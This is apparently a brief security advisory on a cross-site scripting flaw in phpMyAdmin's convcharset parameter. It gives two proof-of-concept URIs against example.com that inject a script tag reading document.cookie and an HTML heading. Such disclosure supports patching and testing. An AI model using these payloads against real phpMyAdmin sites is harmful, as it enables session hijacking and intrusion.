PHPMyAdmin Convcharset Cross-Site Scripting Vulnerability

PHPMyAdmin Convcharset Cross-Site Scripting Vulnerability

No exploit is required.

The following proof-of-concept URIs are available:

http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script>

http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1>